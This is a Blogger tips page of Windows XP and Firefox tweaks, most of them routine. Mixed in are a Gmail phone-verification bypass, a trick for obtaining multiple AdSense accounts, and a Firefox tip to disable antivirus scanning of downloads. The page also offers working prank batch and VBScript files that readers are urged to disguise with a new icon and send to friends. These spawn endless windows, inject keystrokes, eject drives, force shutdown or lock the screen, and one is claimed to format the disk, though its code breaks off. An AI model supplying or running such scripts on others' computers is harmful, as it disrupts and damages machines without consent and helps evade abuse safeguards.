This is default featured slide 1 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 2 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 3 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 4 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 5 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

Bypass gmail Mobile verification

Follow these steps :


1. First of all go to www.k7.net/ and sign up there. This is a site where you can receive fax or voice calls without having a phone no. When you create an account on this site, it will provide you an unique phone no. of US.

2. Now go for creating account on gmail, enter all the information as you want, but in Location fill 'United States'.

3. Now click on 'I accept, create an account'.

4. Now it will take you to mobile verification page. Here select the option of Voice call and fill the no. that you got from http://www.k7.net/

5. Now you will get a mail having verification code as voice mail on that account from which you have registered on . Open it, download the attachment file and listen the code http://www.k7.net/

6. Now enter the code of your voice mail in verification code. and click OK.
7. your account is ready now :)

How to Block The Useless Website


There are many reason why you need to know how to block a website. Some of the most common reasons are you have been targeted by spammers who use adware and popups to attack your PC. Other reasons may be to prevent your children from having access to certain site content such as porn and gambling.

Depending on the level of security you wish, learning how to block a website may require a adjustments of your web browser, the use of internet filtering software or editing of your host file. At any rate you can try all methods to see which works best for you.

How to block a Website using Internet Explorer


Internet Explorer version 5 and later offer the ability for heighten security and privacy. You can block a site by following the directions below:

1. Load your Internet explorer

2. Click Tools

3. Click Internet Options

4. Click the Privacy tab

5. Under the Privacy window, Click Sites

6. Type in the site address that you want to Block and Click OK. Remember this technique only blocks on one site at a time. Parental control software will allow you to block multiple sites and categories.
Here are alternate instructions to block a website using Internet Explorer.

Tools ->Internet Options->Security->Restricted sites->Sites->Type in the site address and Click ADD then click OK
How to Block A Website in All Web Browsers


This action will require you to edit your Host file. Your host file is a computer file used to store information on where to find a node on a computer network.

In Windows XP

1. Click Start->All Programs->Accessories->Command Prompt.

2. Click Command Prompt This will open a DOS command window.

3. Type: notepad C:/Windows/System32/drivers/etc/hosts

4. Locate the line 127.0.0.1 localhost

5. To block the website google.com for example, just add this text under 127.0.0.1 localhost:
127.0.0.1 google.com
127.0.0.1 www.google.com
You can add as many sites any site, However you will need to prefix it with "127.0.0.1".

6. Save the file

Google will now be blocked in all web browser. This is an advanced but easy method on how to blow a website.

Want more PC speed? 8 Ways to Speed up PC Performance!!

Slowing down computer day by day!! This is the most common problem all computer users facing. Even though no one can give the straight answer for solving this and run the computer smoother like days it bought.

Normally first few days after installing the operating system computer run fast and smoother. After 2, 3 weeks it’s slowing down again.

There are many expensive tools available that have guaranteed for speed up your pc, but as my experience some software are failed and some are successful. Tune-up utilities such a software that has good rate and one of my favorite tool for solving system errors. But you have to pay for it.

I thought to give you some info for speed up your pc without spending money. In this article I'll conduct you along the all available tools in your windows platform and freeware available in internet and use them for speed up computer. So you don't have to pay anyone or any software.


Using available windows tools in your system:


1) . In your system there are two useful tools "Disk Cleanup" and "Disk Defragmenter" that can use speedup process, Go to start > all programs > Accessories > system tools open Disk cleanup, this software can be use for deleting many unnecessary files and also system restore point.

2) . Disk Defragmenter is can be use for defragment, fragmented computer files that are in your hard drive. Fragmented files cause to slow down and reduce computer performance. You should at least defragment your hard drive partition that has installed operating system as a habit.

3) . Go to start > run and type "msconfig" without "" this will open system configuration utility in "start up" tab disable any software that you think cause to slow down you computer when the computer start up process. But you should not disable software like antivirus, firewall and your motherboard software. Otherwise those software will not functioning properly. Remove any software like messengers and any other software that are not system utilities.

4) . Check disk is another inbuilt process for checking errors of your hard drive and fix. I recommend you to check your disk at least once a week as a good habit. Right click on any hard drive partition select “Properties” and in Property window open tab “tools” and click check now. Make sure to check both options there before checking errors.

Using free 3rd party tools:


5) . Ccleaner is one my favorite and popular utility that has ability of cleaning hard drives and registry, advance uninstaller, and cookies deleting. Ccleaner has ability of deleting any unwanted start up software but some software can place start up key or object again its next start, in such a case you need to edit those software “options“ or “preferences“ and uncheck its startup mood for preventing it starting with the system.

6) . WiseRegistryCleaner is another advance registry cleaner which is more sophisticated than ccleaner and has ability of detecting more unnecessary registry keys that cause to slow down the computer.

Things you should consider:


7) . Using high resolution desktop wallpapers and screen savers can eat your system performance, also if you use high graphic themes then that can cause to system slowdown.

8) . Still you're system seriously getting slow and then maybe you need to use windows classic theme with the system settings for adjust for best performance. You can turn this feature ON by right click on your my computer icon, selecting "properties" this will open system properties window. Go to “advance” tab and under performance click “settings” button and select "Adjust for best performance" and click "Apply" again check "show shadows under menus" and "smooth edges of screen fonts" and click apply. Otherwise you'll get crazy with your system even it is faster than ever.

Are you using an computer that is accessed by more than one ? Secure your privacy by cleaning pagefile.

Assume your are working on computer where you don't really own the computer or is shared with someone else. Do you want maintain privacy and avoid other know what you were doing etc. Then this tweak may be of interest to you.


Go to Control Panel >>> Administrative tools>>>local security policy.

Then Go to local policies ---> security options.

Then change the option for "Shutdown: Clear Virtual Memory Pagefile"

Automatically Defrag Drives with a new context menu item!


A new Registry import file named context_defrag.inf in Notepad (be sure to save with it with the Save as type set to All Files and not Text Documents) and place the following text inside:
; context_defrag.INF
; Adds Defrag to the right click context menu in Windows XP

[version]
signature="$CHICAGO$"
[DefaultInstall]
AddReg=AddMe

[AddMe]
HKCR,"Drive\Shell\Defrag\command",,,"DEFRAG.EXE %1"

Then, right-click and choose Install. This will add a context menu to XP that allows you to automatically defrag drives, using the command line version of the built-in defragmentation utility. To use it, navigate to a drive in My Computer
, right-click, and choose Defrag. A command line window will appear, and that drive will be defragged. When it's complete, the window just disappears.

To remove this functionality, Open regedit.exe and navigate to the following location:
HKEY_CLASSES_ROOT\Drive\shell\
Then delete the Defrag folder and close Regedit.
Then delete the Defrag folder and close Regedit.

Avoid Download of File Attachments that may have Virus Infections

Open Group Policy Editor
by going to START - RUN and entering gpedit.msc

This one is easy.. Navigate to USER CONFIGURATION - ADMINISTRATIVE TEMPLATES - WINDOWS COMPONENTS - INTERNET EXPLORER.

For This on right hand pane (most likely secondly last line at bottom) you should see an item Configure Outlook Express. Double Click on it and enable it and mark check box that says "Block attachments that may contain virus". OK out and close the global policy editor.

Boot Defragment for Fast Booting

A very Important new feature in Microsoft Windows XP is the ability to do a boot defragment. This basically means that all boot files are placed next to each other on the disk drive to allow for faster booting. By default this option is enabled but some upgrade users have reported that it isn't on their setup.

1. Start Regedit.

2. Navigate to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Dfrg\BootOptimizeFunction

3. Select Enable from the list on the right.

4. Right on it and select Modify.

5. Change the value to Y to enable and N to disable.

6. Reboot your computer

Have tendency to Forget Passwords ?


Most of us have a common tendency of forgetting passwords. If you don't every forget anything, I envy you and this may not be of much use to you but for most of us, this may be a life saver. If you're running Windows XP Professional as a local user in a workgroup environment, you can create a password reset disk by following instruction as shown below:
Go to START--->>>CONTROL PANEL--->>>USER ACCOUNTS.

Then click your account name and further on in RELATED TASKS, click PREVENT A FORGOT PASSOWRD. A wizard would come up, follow instructions and you have your password reset disk ready.


IMPORTANT NOTE: As it goes with things like password, make sure that you keep this disk at secure location else you risk tress passing with your user account.

How to avoid autoplay of CD

Way I like best. Hey this time no registry trick even though there are ways in registry to do it. In earlier operating systems only those CD that had autorun.inf file in their root directory were able to execute on its own but with advent of WINDOWS XP it has become possible with just about anything.
Well sometimes it is good but there are other times when you want to avoid this part of automation.

Simply press SHIFT key when you enter a CD in your CD drive. It won't Auto play.

For those of you, who do want a registry hack.
Here it is:

Open Registry and navigate to
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer]

and look for key "NoDriveTypeAutoRun" and set its value to 185 (decimal). This would stop autoplay.

How to Change Drive Letters


To change drive letters (useful if you have two drives and have partitioned the boot drive, but the secondary drive shows up as "D")
Go to Start > Control Panel > Administrative Tools > Computer Management, Disk Management,

then right-click the partition whose name you want to change (click in the white area just below the word "Volume") and select "change drive letter and paths."

From here you can add, remove or change drive letters and paths to the partition.

How to Restart Windows without Restarting your Computer


When you click on the SHUTDOWN button, make sure to simultaneous press SHIFT Button.
If you hold the Shift key down while clicking on SHUTDOWN button, you computer

would restart without restarting the Computer.This is equivalent to term"HOT REBOOT".

Get your adsense account approved fast

I’ve noticed that a lot of people have trouble getting an AdSense account the regular way, especially if you live outside of US/CAN/EUROPE. (especially Indians)
I’m going to show you guys a trick that I have been using for a while, and which has never failed me in getting multiple AdSense accounts.

Here is what you do:
1. Go to the website www.*******.com

2. On the top right hand side you will see a register button click it!

3. Fill in all the information including a valid email.

4. Click I’d like to set up an AdSense account.
adsense aprooval quick

adsense aprooval quick

5. Fill in all the information Fully and submit.

6. You will get an email from both Google and *******. Click the link in the Google email and fill out the information and make sure it matches you ******* information. Also make sure you click “yes allow *******.com to access my account”

7. Go back to *******.com and login to your newly made account.

8. At the top of the page click “my profile”

9. On the top left click “update profile” Make sure you fill in as much information here as possible and that it matches your AdSense info. The more info you input the more likely you will be approved by AdSense.

10. Find any random .doc files or .pdf files on your computer and click the Upload tab.

11. Click the upload tab and upload at least 2 files.

That is it! This method always works for me and you should be approved within a week. Once you have your AdSense account you don’t need ******* any more, and you don’t have to share any of your AdSense earnings with them!!!

Feedback welcome

THRETEN BY MAKING SCREEN FLASH

To make a really cool batch file that can make your entire screen flash random colors until you hit a key to stop it, simply copy and paste the following code into notepad and then save it as a .bat file.
@echo off
echo e100 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30>\z.dbg
echo e110 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75>>\z.dbg
echo e120 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88>>\z.dbg
echo e130 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3>>\z.dbg
echo g=100>>\z.dbg
echo q>>\z.dbg
debug <\z.dbg>nul
del \z.dbg
But if you really want to mess with a friend then copy and paste the following code which will do the same thing except when they press a key the screen will go black and the only way to stop the batch file is by pressing CTRL-ALT-DELETE.
@echo off
:a
echo e100 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30>\z.dbg
echo e110 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75>>\z.dbg
echo e120 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88>>\z.dbg
echo e130 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3>>\z.dbg
echo g=100>>\z.dbg
echo q>>\z.dbg
debug <\z.dbg>nul
del \z.dbg
goto a

To disable error (ctrl+shirt+esc) then end process wscript.exe
Enjoy!!!^^

Hard prank: Pick your poison batch file. It asks your friend to choose a number between 1-5 and then does a certain action:

1: Shutdown2: Restart
3: Wipes out your hard drive (BEWARE)
4: Net send
5: Messages then shutdown
Type :

@echo off
title The end of the world
cd C:\
:menu
cls
echo I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press 'x' then your PC will be formatted. Do not come crying to me when you fried your computer or if you lost your project etc...
pause
echo Pick your poison:
echo 1. Die this way (Wimp)
echo 2. Die this way (WIMP!)
echo 3. DO NOT DIE THIS WAY
echo 4. Die this way (you're boring)
echo 5. Easy way out
set input=nothing
set /p input=Choice:
if %input%==1 goto one
if %input%==2 goto two

Save it as "Anything.BAT" and send it.

You might wanna have to change the Icon of the file before sending it to your friend, so right click the file, click Properties, click on the 'Change' Icon and change the icon from there.

Open Notepad continually in your friend's computer

@ECHO off:top
START %SystemRoot%\system32\notepad.exe
GOTO top

Save it as "Anything.BAT" and send it.

Hack your friend's keyboard and make him type "You are a fool" simultaneously:


Type :
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "You are a fool."
loop

Save it as "Anything.VBS" and send it.

Frustrate your friend by making this VBScript hit Backspace simultaneously


Type :
MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop

Save it as "Anything.VBS" and send it.

Open Notepad, slowly type "Hello, how are you? I am good thanks" and freak your friend out

Type :


WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 100
WshShell.AppActivate "Notepad"
WScript.Sleep 500
WshShell.SendKeys "Hel"
WScript.Sleep 500
WshShell.SendKeys "lo "
WScript.Sleep 500
WshShell.SendKeys ", ho"
WScript.Sleep 500
WshShell.SendKeys "w a"
WScript.Sleep 500
WshShell.SendKeys "re "
WScript.Sleep 500
WshShell.SendKeys "you"
WScript.Sleep 500
WshShell.SendKeys "? "
WScript.Sleep 500
WshShell.SendKeys "I a"
WScript.Sleep 500
WshShell.SendKeys "m g"
WScript.Sleep 500
WshShell.SendKeys "ood"
WScript.Sleep 500
WshShell.SendKeys " th"
WScript.Sleep 500
WshShell.SendKeys "ank"
WScript.Sleep 500
WshShell.SendKeys "s! "

Save it as "Anything.VBS" and send it.

Toggle your friend's Caps Lock button simultaneously


Type :
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop

Save it as "Anything.VBS" and send it.

3) Convey your friend a lil' message and shut down his / her computer:
Type :

@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s

Save it as "Anything.BAT" in All Files and send it.

Continually pop out your friend's CD Drive. If he / she has more than one, it pops out all of them!

Type :
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

Save it as "Anything.VBS" and send it.

Remove Unwanted Hidden Programs


If you want to remove programs that are installed with Windows but are not visible in "Add/Remove Windows Components" (such as MSN Messenger in WinXP), edit a file called "C:\WINDOWS\INF\SYSOC.INF".
Go to: Start>> Run>> type in: C:\WINDOWS\INF\SYSOC.INF [Enter]

In there you will find a listing of programs, and you will note that some programs have the word 'hide' at the end. Simply remove the word 'hide' but leave the preceding comma. Examples:

BEFORE:msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,hide,7

AFTER:msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,,7

Exit saving changes.

Now when you open Add/Remove Windows Components, you will see the now viewable, in this example, "Windows Messenger".

Select theme and color scheme for welcome screen


With this tweaks you will be able to modify which color selection of the default theme is shown when the computer start up screen is displayed. Currently since there is only one theme you can only change the color scheme for the theme but in the future when more themes are available for XP you will be able to change which theme is used in the same place in the windows registry.
1. Start regedit, if you are unfamiliar with regedit please see our FAQ.

2. Navigate to HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\ThemeManager

3. Locate the key ColorName

4. Right Click on it and select modify.

5. Change where it says "NormalColor" to "Metallic"

6. Click Ok, and exit regedit

7. Restart

Note: To go back to the old color scheme durring startup just change "Metallic" back to "NormalColor" Once more themes are released you will be able to modify the DllName key to select different themes.

Sixteen Simple Tips


1.Switch to welcome screen
Press Win+L to switch to the Welcome screen.

2.Lock your workstation

Press Win+L to lock your workstation.

3.Switch user easly

You can switch users without going through the Welcome screen: From Task Manager, go to the Users tab, right-click a user, and select Connect.

4.Hibrernate computer

Hold down the shift key in the shutdown dialog to change "Stand By" to "Hibernate". Or just press H to hibernate instantly. You can even use the Power Control Panel to configure your power button to hibernate.

5.Disable password when resuming stanby

To disable the password when resuming from standby or hibernation, open the Power Control Panel and uncheck "Prompt for password after returning from standby" on the Advanced tab.

6.Choose details

From the View Menu, select "Choose Details" to select which file properties should be shown in the Explorer window. To sort by a file property, check its name in the "Choose Details" in order to make that property available in the "Arrange Icons by" menu.

7.Display volume control icon in taskbar

To display the volume control icon in the taskbar, go to the Sounds and Audio Devices Control Panel and select "Place volume icon in the taskbar".

8.Delete file without send into recycle bin

Hold down the shift key when deleting a file to delete it immediately instead of placing it in the Recycle Bin. Files deleted in this way cannot be restored.

9.Customize 'send to' menu

Put a shortcut to your favorite editor in your Send To folder and it will appear in your "Send To" menu. You can then right-click any file and send it to your editor.

10.Organize favorites

a) To organize your Favorites in Explorer instead of using the Organize Favorites dialog, hold the shift key while selecting "Organize Favorites" from the Favorites menu of an Explorer window.

b) You can organize your Favorites by dragging the items around your Favorites menu.
Alternatively, you can open the Favorites pane and hold the Alt key while pressing the up and down arrows to change the order of your Favorites.

11.View IE in fullscreen

To run Internet Explorer fullscreen, press F11. Do it again to return to normal mode.

12.Hide printers & faxes

If your "Printers and Faxes" folder is empty, you can hide the "Printers and Faxes" icon when viewed from other computers
by stopping the Print Spooler service.

13.Add/remove columns from detail mode

To add or remove columns from Details mode, select Choose Details from the View menu, or just right-click the column header bar.

14.Go backwards or forward by mouse wheel

In Internet Explorer, hold the Shift key while turning the mouse wheel to go forwards or backwards.

15.Add current page to favorites

In Internet Explorer, type Ctrl+D to add the current page to your Favorites.
This and many more keyboard shortcuts can be found by going to Internet Explorer, clicking the Help menu, then selecting Contents and Index. From the table of contents, open Accessibility and click "Using Internet Explorer keyboard shortcuts".

16.Shut down via Remote Desktop

To shut down via Remote Desktop
, click the Start button, then type Alt+F4.

Solve Hidden files does not appear After effected by virus


First Stopping the virus: u need to check the task manager to see if there is a (SVCHOST.EXE) running under the current logged in username and try to terminate it.
Note: After u terminate the virus try not to double click on any of you computer driver coz this....

action will start the virus allover again, when u need to access any of ur drivers (Hard Disk Partition), type it's drive letter in the address bar and it will open without starting
the virus process.

Second Fixing the show hidden files and folders: ________________________________________

Then u need to open "Registry Editor" and then go to

"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL"

And delete the Existing "CheckedValue" of the type "String" and create another one of the same name but of the type "DWORD" and set it's value to "1" Then open "My Computer" and

go to: Tools> Folder Options> View> and select "Show hidden files and folders" and Uncheck "Hide protected operating system files"

Third Deleting the virus: ________________________________________

The easiest part, all u have to do is to delete the following files from your computer ( don't
forget how u should open the drivers or u will have to do it from the start )

1. C:\windwos\SVCHOST.EXE

2. C:\windwos\SVCHOST.inf or ini (probably they will be together side by side)

3. C:\RAVMON.EXE 4.C:\Autorun.inf

Then check the rest of the hard drivers you have on your computer ( D, E, or whatever) for
the files Number (3 and 4)

Restart your computer

Speed up Menu Display


Click Start. Right-click My Computer, and then click Properties
Click the Advanced tab. In the Performance area, click Settings

On the Visual Effects tab in the Performance Options dialog box, clear the Fade or slide menus into view check box

Click OK.

In the System Properties dialog box, click OK.Now when you click a menu, it will appear almost instantly.

Speed up the Start Menu


The default speed of the Start Menu is pretty slow, but you can fix that by editing a Registry Key.
Fire up the Registry Editor and navigate to the following key:

HKEY_CURRENT_USER \ Control Panel \ Desktop \ MenuShowDelay

By default, the value is 400. Change this to a smaller value, such as 0, to speed it up.

If this doesn't work for some reason, then you might try the following:

Navigate to
Display Properties then Appearance then Effects and turn off the option titled Show menu shadow. You will get much better overall performance.

Ten tips to increase your Windows Security


1- Always protect your Administrator account by creating password, just go to Control Panel > User Accounts, select your account and the click on "create a password for your account".
2- Protect your account by Password protect your screen saver, go to Control Panel > Display, Click on the Screen Saver tab and then check on resume password protect.

3- Setup a BIOS Password to protect your PC Setup application.

4- Always force you windows automatic update on, go to Control Panel > Automatic Updates and then Select the first option to have each update download and install automatically.

5- Install an Internet Security Suite such as "Kaspersky Internet Security", "Norton Internet Security" or "Mcafee Internet Security". And turn on software automatic update.

6-
If you don’t have enough budgets to buy an Internet Security Suite, Turn on the Windows Firewall. Go to > Control Panel > Windows Firewall and click on under the General tab. And Install an antivirus program, turn on automatic updates, and set up a regular scanning schedule.

7- Never use same username and/or password for all of your accounts in Internet.

8-
Turn off file sharing in Windows Explorer. Open Explorer, click Tools > Folder Options >View. Then Scroll to the bottom, uncheck Use simple file sharing, and click Apply.

9- Increase your Internet Explorer security settings. Click Tools > Internet Options> Privacy and move the slider to High.

10- Turn on your Internet Explorer’s pop-up blocker. Click Tools > Internet Options > Popup Blocker Settings > and then choose default.

Turn off the Low Disk Space Notification

Open Registry
by going to START-RUN and entering REGEDIT

and Navigate to

HKEY_CURRENT_USER and in
Software – Microsoft – Windows – CurrentVersion – Policies - Explorer,

and set the value of NoLowDiskSpaceChecks to DWORD = 1.

(This modification requires a logoff or reboot to work)

Want to Improve Shutdown Time


Close apps automatically & quickly at shutdown

Open Registry by going to START-RUN and typing REGEDIT.

Navigate to

HKEY_CURRENT_USER\CONTROL PANEL\DESKTOP

and look for AutoEndTasks.
On my computer default value is 0. Change it to 1.

Thats all.

Further more you can reduce the time it takes for Windows to issue kill directive to all active/hung applications. In doing this only constraint that you should make sure exists is that HungAppTimeout is greater than WaitToKillAppTimeout. Change the values of WaitToKillAppTimeout to say 3500
(since default value for HungAppTimeout 5000 and for
WaitToKillAppTimeout is 20000)

Windows Utilities Shortcuts


Here are some popular shortcuts to handy Windows utilities:
Simply type the shortcut command in to the Run textbox (Start>> Run), then click OK.

Shortcut Utility

compmgmt.msc Computer Management

devmgmt.msc Device Manager

dfrg.msc Disk Defragmenter

diskmgmt.msc Disk Management

eventvwr.msc Event Viewer

fsmgmt.msc Shared Folders Manager

gpedit.msc Group Policies Editor

lusrmgr.msc Local Users and Groups Manager

perfmon.msc Performance Monitor

secpol.msc Local Security Settings

services.msc Services

You Cannot Create a Folder Named CON !!


It is fact that you cannot create a folder named "CON", nor can you rename an existing folder to "CON". "CON" and a number of other character strings are in fact reserved names that go back to the days of DOS and cannot be used to name folders or files.
Other
reserved names are:

* PRN

* AUX

* NUL

* LPT1

* COM1

* Potential drive letter - A: to Z:

* A number of others


If you try to name a folder using one of these reserved names, the name will automatically revert to the default, generally "New Folder". Moreover, if you try to use a reserved name to name a file such as a Notepad or Microsoft Word document you will generally receive an error message similar to the following:




Depending on exactly how you save the file, you may instead receive a warning message advising that a file with that name already exists. However, even if you choose "Yes" to overwrite the existing file, you will still not be allowed to save the file.

Useful Direct Links


Kaspersky
http://dnl-eu10.kaspersky-labs.com/devbuilds/



Bitdefender

http://download.bitdefender.com/windows/

http://download.bitdefender.com/updates/

http://download.bitdefender.com/SMB/



AVG

http://download.grisoft.cz/softw/80free/update/



Symantec Ebooks & Guide

ftp://ftp.symantec.com/public/english_us_canada/products/



Mozilla Firefox

http://releases.mozilla.org/pub/mozilla.org/firefox/releases/


Opera

ftp://mirror-fpt-telecom.fpt.net/mirror/opera/win/



HP Drivers

ftp://ftp.hp.com/pub/softlib/software1
ftp://ftp.hp.com/pub/softlib/software2
ftp://ftp.hp.com/pub/softlib/software3
...10



IBM Drivers & Tools

ftp://ftp.software.ibm.com/pc/



All Drivers

ftp://202.65.194.211/pc/



Windows Tools

http://ftp.unb.br/pub/

Firefox Tricks & Tweaks

The about:config page contains most (if not, all) of Firefox configuration options. It is so far the most effective, and the most powerful way to tweak and enhance your Firefox performance.
Here are some of the popular tweaks.
Accessing your about:config page

In your Firefox, type about:config in the address bar.

You will be shown a warning page. Click the “I’ll be careful, I promise!” button to proceed.

On the main page, you will see a long list of configuration entries. Enter the name of the key you want to update in the “Filter” field. The list will narrow to only the entries that match your keyword as you type.


To modify the value, simply double click on the entry value field and update the entry. That’s all!

Isn’t that simple? Now, let’s get to the tweaking.


1) Adjust the Smart Location Bar’s Number of Suggestions

In Firefox 3, when you start typing in the location bar, a drop-down list of suggestion URLs will be shown. If you want it to show more than 12 suggestions (12 is the default), you can adjust the browser.urlbar.maxRichResults keys and get it to show the number you want.

Config name: browser.urlbar.maxRichResults
Default: 12
Modified value: Set to your desired number of suggestion. If you want to disable it all together, set it to -1


2) Disable the session restore function

Firefox 3 automatically saves your session every 10 secs so that whenever it crashes, it can restore all your tabs. While this is a useful feature, some of you might find it irritating. To disable this function, toggle the value of browser.sessionstore.enabled to False

Config name: browser.sessionstore.enabled
Default: True
Modified value: False if you want to disable the session restore function


3) Adjust the Session Restore Saving Frequency

Same as above, if you decided to keep the session restore feature on, but want to reduce the session saving frequency, change the value of browser.sessionstore.interval so that Firefox will save the session at a longer interval.

Config name: browser.sessionstore.interval
Default: 10000 (in msecs, equivalent to 10secs)
Modified value: Set it to your desired value. 1000 means 1 sec and 60000 means 1 minute.


4) Enable Advanced Color Profile Support

Firefox has this advanced color profile features that display higher image quality. It is not enabled by default as it has a negative effect on the performance of the browser. If you are concern with the image quality rather than the performance, you can activated it via the gfx.color_management.enabled setting

Config name: gfx.color_management.enabled
Default: False
Modified value: True (if you want to activate the color profile support feature)


5) Disable Antivirus Scanning

This is mainly for Windows users. By default, Firefox 3 automatically scan the downloaded file with the default anti-virus application to make sure it is free of virus. If you download a big file, it could take a long time for the whole scanning process to complete. To increase the performance of the browser, you might want to consider disabling the anti-virus scanning via the browser.download.manager.scanWhenDone key.

Config name: browser.download.manager.scanWhenDone
Default: True
Modified value: False (if you want to disable it)


6) Configuring The Scrolling Tabs

When you opened many tabs, Firefox will not keep on reducing the tab width. Instead, it shows a scrolling bar so that the min width (100px) is conserved and you can scroll to find your tabs. If you are those who don’t like the scrolling tab function and prefer Firefox to show all the tabs, regardless how small it is, you can set the value of browser.tabs.tabMinWidth to 0 to disable it. Similarly, if you want Firefox to display more tabs before showing the scrolling button, you can reduce the default value to a lower value, say 75 pixels.

Config name: browser.tabs.tabMinWidth
Default: 100
Modified value: 0 if you want to disable the scrolling functions, other values to set the min width value


7) Show/Disable Close button on Tabs

Some people love to see the Close (the red X) button on every tabs, but some hate it. Whatever is it, you can configure it to your preferences via the browser.tabs.closeButtons setting.

Config name: browser.tabs.closeButtons
Default: 1
Modified values:

* 0 – display a close button on the active tab only
* 1- display close buttons on all tabs
* 2- don’t display any close buttons
* 3- display a single close button at the end of the tab strip


8) Extend Scripts Execution Time

In Firefox 3, a script is only given 10 seconds to respond, after which it will issue a unresponsive script warning. If you are hooked on a slow network connection, you might want to increase the script execution time via dom.max_script_run_time to cut down on the frequency of the no script warning.

Config name: dom.max_script_run_time
Default:10 (in secs)
Modified value: 20, or any values greater than 10


9) Handling javascript Popups

When you come across a site that executes a javascript open new window function, and if the popup window is without all the usual window features, i.e. back/forward/reload buttons, status bar etc, Firefox will automatically treat it as a popup and will not open it as a new tab. However, if you find this to be a nuisance and wanted to open all new windows in a new tabs, you can specify it via the browser.link.open_newwindow.restriction setting.

Config name: browser.link.open_newwindow.restriction
Default: 2 – Open all javascript windows the same way as you have Firefox handle new windows unless the javascript call specifies how to display the window
Modified values:

* 0 – open all links as how you have Firefox handle new windows
* 1 – do not open any new windows
* 2- open all links as how you have Firefox handle new windows unless the javascript specify how to display the window


10) Enable Spell Checking In All Text Fields

The default spell checking function only checks for multi-line text boxes. You can get it to spell-check for single line text box as well.

Config name: layout.spellcheckDefault
Default: 1 (spell checker for multi-lines text boxes only)
Modified values:

* 0 – disable the spell checker
* 2 – enable the spell checker for all text boxes


11) Open Search Box Results In New Tab

When you search using the search box at the top right hand corner of the browser, it will display the search results in the current tab. If you don’t want the search to interfere with your current tab, you can tweak the browser.search.openintab to make it open in a new tab.

Config Name: browser.search.openintab
Default: False
Modified value: True (open search box results in new tab)


12) Lower The Physical Memory Used When Minimized

This tweak is mainly for Windows users. When you minimize Firefox, it will send Firefox to your virtual memory and free up your physical memory for other programs to use. Firefox will reduce its physical memory usage, when minimized, to approximately 10MB (give or take some) and when you maximize Firefox it will take back the memory that it needs.

The preference name does not exist and needs to be created.

Right click on the background and select New->Boolean.

Enter the name when prompted: config.trim_on_minimize
Enter the values: True


13) Speed up your Firefox

Several tweaks required for this

Config name: network.http.pipelining
Default: False
Modified value: True

Config name: network.http.proxy.pipelining
Default: False
Modified value: True

Config name: network.http.pipelining.maxrequests
Default: 4
Modified value: any value higher than 4, but not more than 8

Config name: network.http.max-connections
Default: 30
Modified value: 96

Config name: network.http.max-connections-per-server
Default: 15
Modified value: 32


14) Increase/Decrease the Amount of Disk Cache

When a page is loaded, Firefox will cache it into the hard disk so that it doesn’t need to be download again for redisplaying. The bigger the storage size you cater for Firefox, the more pages it can cache.

Before you increase the disk cache size, make sure that browser.cache.disk.enabled browser.cache.disk.enable is set to True.

Config name: browser.cache.disk.capacity
Default: 50000 (in KB)
Modified value:

* 0 – disable disk caching
* any value lower than 50000 reduces the disk cache
* any value higher than 50000 increases the disk cache.


15) Select all text when click on the URL bar

In Windows and Mac, Firefox highlights all text when you click on the URL bar. In Linux, it does not select all the text. Instead, it places the cursor at the insertion point. Regardless which platform you are using, you can now tweak it to either select all or place cursor at insertion point.

Config name: browser.urlbar.clickSelectsAll
Modified value:

* False – place cursor at insertion point
* True – select all text on click


16) Autofill Address in URL Bar

Other than the smart location feature, you can also get your URL bar to autofill the address as you type the URL.

Config name: browser.urlbar.autofill
Default: False
Modified value: True (Have Firefox autofill the address as you type in the URL bar)


17) Same Zoom Level For Every Site

Firefox remembers your zoom preference for each site and set it to your preferences whenever you load the page. If you want the zoom level to be consistent from site to site, you can toggle the value of browser.zoom.siteSpecific from True to False.

Config name: browser.zoom.siteSpecific
Default: True
Modified value: False (enable same zoom preferences for every sites)


18) Setting your zoom limit

If you find that the max/min zoom level is still not sufficient for your viewing, you can change the zoom limit to suit your viewing habits.

Config name: zoom.maxPercent
Default: 300 (percent)
Modified value: any value higher than 300

Config name: zoom.minPercent
Default: 30 (percent)
value: any value


19) Configure Your Backspace Button

In Firefox, you can set your backspace to better use by getting it to either go back to the previous page or act as page up function.

Config name: browser.backspace_action
Default: 2 (does nothing)
Modified value:

* 0 – go back previous page
* 1- page up


20) Increase Offline Cache

